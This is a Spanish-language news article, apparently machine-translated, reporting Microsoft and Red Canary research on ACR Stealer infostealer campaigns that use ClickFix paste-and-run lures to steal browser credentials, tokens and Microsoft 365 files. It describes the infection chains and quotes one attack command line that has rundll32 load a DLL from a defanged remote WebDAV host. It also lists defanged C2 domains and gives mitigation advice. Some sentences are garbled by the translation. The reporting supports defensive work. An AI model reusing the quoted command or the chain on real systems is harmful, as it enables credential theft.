Cerrar menú
  • Inicio
  • Identidad
  • Inventos
  • Futuro
  • Ciencia
  • Startups
  • English
What's Hot

ACR Stealer utiliza el señuelo ClickFix para robar tokens del navegador y archivos de Microsoft 365

El nuevo malware GoSerpent apunta a gobiernos y diplomáticos del sudeste asiático para realizar espionaje

El informe de la ESA destaca el creciente papel de Europa en la economía espacial

Facebook X (Twitter) Instagram
  • Home
  • Contáctenos
  • DMCA
  • Política de Privacidad
  • Sobre Nosotros
  • Términos y Condiciones
  • 📢 Anúnciate con Nosotros
  • Enviar publicaciones
FySelf Noticias
  • Inicio
  • Identidad
  • Inventos
  • Futuro
  • Ciencia
  • Startups
  • English
FySelf Noticias
Home»Identidad»ACR Stealer utiliza el señuelo ClickFix para robar tokens del navegador y archivos de Microsoft 365
Identidad

ACR Stealer utiliza el señuelo ClickFix para robar tokens del navegador y archivos de Microsoft 365

corp@blsindustriaytecnologia.comBy corp@blsindustriaytecnologia.comjulio 17, 2026No hay comentarios8 minutos de lectura
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

ACR Stealer, un ladrón de información que ha estado en circulación desde 2024, deja las redes corporativas con archivos como contraseñas guardadas del navegador, tokens de sesión en vivo, archivos PDF, documentos de Microsoft 365 y carpetas sincronizadas de OneDrive y SharePoint.

Se interrumpe porque alguien pega un comando en el cuadro Ejecutar y presiona la tecla Intro. Microsoft anunció dos de las cadenas de entrega el jueves. El equipo de Defender Experts, el brazo de detección administrado de la compañía, observó un aumento en la actividad de ACR Stealer en los entornos de los clientes desde finales de abril hasta mediados de junio, diciendo que la campaña fue «exitosa en el robo de credenciales de navegador, tokens de autenticación y documentos confidenciales utilizando señuelos ClickFix».

Ambas cadenas se abren con el mismo mensaje y luego se dividen. Uno deja rastros en el disco, el otro se ejecuta casi por completo en la memoria. La guía de reparación de Microsoft instruye a las víctimas a revocar tokens además de rotar contraseñas.

Carga útil en píxeles

El informe dice que es probable que las indicaciones lleguen a través de publicidad maliciosa y resultados de búsqueda manipulados por SEO. La cadena sin archivos comienza cuando el comando pegado genera mshta.exe y extrae el contenido HTA remoto. El cargador de VBScript integrado utiliza objetos COM para decodificar e iniciar PowerShell. Esta etapa crea una identidad de víctima, deshabilita la validación de certificados y ejecuta lo que se recupera en la memoria.

Lo que obtienes es un JPEG del servidor de imágenes donde la carga útil está en píxeles. Una rutina personalizada lo divide, lo descifra, lo descomprime y lo ejecuta de manera reflexiva. A continuación, pasamos a Chrome y Edge, leemos su base de datos de datos de inicio de sesión y su base de datos de datos web, y llamamos a DPAPI para descifrar las contraseñas, cookies y tokens que contienen. Los archivos PDF en el escritorio y en Descargas también se moverán.

El 26 de mayo, Brad Duncan, representante del SANS Internet Storm Center, rastreó una infección de Windows hasta una página que se hacía pasar por el asistente de inteligencia artificial de Anthropic, Claude. Se accedió a esta página a través de un anuncio malicioso de Google, a menudo oculto detrás de una URL sites.google.com. Esta página proporciona instrucciones de macOS cuando se abre en una Mac e instrucciones de Windows cuando se abre en Windows.

Microsoft nunca nombra señuelos. Dos indicadores en la tabla Campaña 2, creativecommunityinfo(.)art y extendblabber(.)cc, aparecen como host de carga útil y C2. Hacker News relacionó ambos con la cadena de Duncan que recorría sus respectivos subdominios hace siete semanas, y el informe de Microsoft cita su diario en sus referencias.

La cadena también adquirió un JPEG de 628 KB del servicio de alojamiento de imágenes ImgBB. Marcó esto como parte de una infección pero no obtuvo nada. «Tampoco encontramos signos obvios de datos incrustados».

Red Canary grabó señuelos de la marca Claude hace un mes, distribuyendo el ACR Stealer a través de páginas de códigos Claude falsas en GitLab, como claude-desktop(.)gitlab(.)io.

La otra cadena deja huellas

La primera escritura en cadena en disco de Microsoft permite a los defensores hacer más trabajo. El comando que pegó recuperará la DLL directamente del recurso compartido WebDAV a través de HTTPS utilizando el directorio GUID y el nombre de archivo que creó para pasar como diferente. Un informe de ejemplo es google.ct.

Red Canary publicó la misma forma de su telemetría de abril en un informe de mayo unas semanas antes del artículo de Microsoft.

«C:\Windows\system32\rundll32.exe» \\sphere-api.dialectosphere.in(.)net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

Dos de las tres variantes vistas por Defender Expert usan Pushd para montar primero el recurso compartido remoto como una unidad local temporal, y la carga útil se ejecuta a través de lo que parece ser una ruta local. El método más sigiloso es envolver esto en conhost.exe –headless para cerrar la ventana de la consola y ocultar las cadenas pushd, rundll32 y del host remoto detrás de la expansión retardada de la variable de entorno.

A continuación se muestra el PowerShell ofuscado. Suelte el ZIP con un nombre inofensivo en una carpeta en %LocalAppData%\Temp. Un ejemplo de Microsoft es LogiOptionsPlus. No parpadea nada en la pantalla porque el pythonw.exe incluido inicia el script Python. El instalador es un actualizador porque borra las copias antiguas antes de la instalación.

Persiste a través de tareas programadas ocultas disfrazadas de actualizaciones de software, copia las marcas de tiempo de notepad.exe en sus propios archivos y borra el historial de PowerShell detrás de él. La etapa final permanece en la memoria y maneja la ejecución a través de la API de Windows Fiber.

En un subconjunto de estas intrusiones, un segundo cargador de Python puede interactuar con puntos finales RPC de blockchain públicos y la infraestructura de nodos Web3 para recuperar cargas útiles o direcciones C2 del libro mayor público. Microsoft llama a esta técnica EtherHiding. Esto significa que colocar un puntero en un contrato inteligente evitará que los resolutores controlados por atacantes lo capturen.

Sin errores, sin números

Ninguna cadena explota las vulnerabilidades. Ambos heredan exactamente lo que el usuario que inició sesión ya tiene, y todas las capas posteriores, montajes WebDAV, extracción de píxeles y transferencias en memoria solo se realizan si el usuario lee el mensaje y presiona Enter. No hay CVE en esta historia. La aplicación del parche no elimina las rutas pegadas y ejecutadas.

Microsoft dice que el cebo es eficaz, pero nunca lo cuantifica. El informe no indica el número de víctimas, el número de clientes afectados ni la línea de base del aumento informado.

La telemetría de abril de Red Canary al menos tiene algunos números. ClearFake, un clúster de inyección web que ha estado alimentando a ACR Stealer desde al menos marzo de 2025, ocupó el puesto número uno en la lista de amenazas más frecuentes por primera vez ese mes, mientras que ACR Stealer empató en el sexto lugar entre los 10 primeros.

Este clúster se entrega a través de JavaScript inyectado en sitios comprometidos, pero el informe de Microsoft no menciona este clúster en ninguna de las cadenas.

¿De quién es este ladrón?

Microsoft es cauteloso con sus afirmaciones. Vincula esta actividad con ACR Stealer en términos de comportamiento observado y artesanía posterior a la explotación, coincide con lo que se sabe públicamente sobre la infraestructura de la familia y no nombra al actor de la amenaza en absoluto. La advertencia se gana.

ACR (también conocido como AcridRain) fue promocionado en foros de habla rusa por un atacante conocido como SheldIO, pero se suspendió en julio de 2024. Las cuentas estaban divididas sobre lo que sucedió después. Según eSentire, el código fuente se vendió. Las cuentas de Proofpoint son diferentes. El comité de Amatera surgió cinco meses después, y el mismo canal de Telegram pidió el cierre en lugar de separarse del equipo.

Cuando se trata de cambiar de marca, están de acuerdo. Proofpoint informó en junio de 2025 que «ACR Stealer se ha actualizado significativamente y se ha rebautizado como Amatera Stealer», con precios que oscilan entre $ 199 por mes y $ 1499 por año. Red Canary trata a ACR y Amatera como una familia y evalúa al propio ACR como un GrMsk Stealer actualizado.

La detección de julio de 2026 denominada ACR Stealer es una llamada de comportamiento a una base de código cuyo nombre ha cambiado al menos una vez y puede haber cambiado de propietario. La etiqueta explica el código. No sabemos quién lo dirige.

donde parar

Un control está antes de todas las técnicas anteriores. Ambas cadenas se ejecutan sin que el usuario pegue el comando en el cuadro de diálogo Ejecutar.

Cortar vector. eSentire recomienda eliminar el mensaje de ejecución a través de GPO y bloquear mshta.exe a través de AppLocker o WDAC. Utilice reglas de control de aplicaciones y reducción de la superficie de ataque para evitar que PowerShell, Python, mshta.exe y rundll32.exe inicien contenido entregado por Internet desde Descargas, Temp o %LocalAppData%. Busque rundll32.exe ejecutándose sin parámetros de línea de comando mientras está conectado a la red. Esto presenta una oportunidad para que Red Canary detecte esta familia. Agrega tareas programadas disfrazadas de actualizaciones de software, control del tiempo y borrado del historial de PowerShell. Aísle hosts sospechosos, rote credenciales, revoque tokens y verifique las conexiones salientes a servicios remotos de alojamiento de imágenes y compartidos.

Microsoft incluyó tres consultas de búsqueda de Defender XDR y 16 dominios de campaña en el informe.

Estas métricas son sólo algunas y se indican como tales en el informe. Es representativo más que toda la gama de familias, y es posible que haya más campañas e infraestructura activas. Los dominios se rotan. Ese no es el caso, porque hacer preguntas en la recepción funciona. Estos señuelos no se reemplazan entre sí, sino que se superponen. Red Canary observó CAPTCHA falsos y páginas claud falsas en la misma telemetría de abril.


Source link

#BlockchainIdentidad #Ciberseguridad #ÉticaDigital #IdentidadDigital #Privacidad #ProtecciónDeDatos
Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticleEl nuevo malware GoSerpent apunta a gobiernos y diplomáticos del sudeste asiático para realizar espionaje
corp@blsindustriaytecnologia.com
  • Website

Related Posts

El nuevo malware GoSerpent apunta a gobiernos y diplomáticos del sudeste asiático para realizar espionaje

julio 17, 2026

CISA agrega CVE-2026-58644 de día cero de SharePoint RCE explotado a KEV

julio 17, 2026

Dos piratas informáticos de Scattered Spider condenados a cinco años y medio cada uno por un hack de TfL de 29 millones de libras esterlinas

julio 16, 2026
Add A Comment
Leave A Reply Cancel Reply

el último

ACR Stealer utiliza el señuelo ClickFix para robar tokens del navegador y archivos de Microsoft 365

El nuevo malware GoSerpent apunta a gobiernos y diplomáticos del sudeste asiático para realizar espionaje

El informe de la ESA destaca el creciente papel de Europa en la economía espacial

CISA agrega CVE-2026-58644 de día cero de SharePoint RCE explotado a KEV

Publicaciones de tendencia

Suscríbete a las noticias

Suscríbete a nuestro boletín informativo y no te pierdas nuestras últimas noticias.

Suscríbete a mi boletín informativo para recibir nuevas publicaciones y consejos. ¡Manténgase al día!

Noticias Fyself es un medio digital dedicado a brindar información actualizada, precisa y relevante sobre los temas que están moldeando el futuro: economía, tecnología, startups, invenciones, sostenibilidad y fintech.

el último

TwinH Presenta una Tecnología Revolucionaria para Cocinas Inteligentes

¡Conoce a tu gemelo digital! La IA de vanguardia de Europa que está personalizando la medicina

TwinH: El cambio de juego de la IA para servicios legales más rápidos y accesibles

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • Contáctenos
  • DMCA
  • Política de Privacidad
  • Sobre Nosotros
  • Términos y Condiciones
  • 📢 Anúnciate con Nosotros
  • Enviar publicaciones
© 2026 noticias.fyself. Designed by noticias.fyself.

Escribe arriba y pulsa Enter para buscar. Pulsa Esc para cancelar.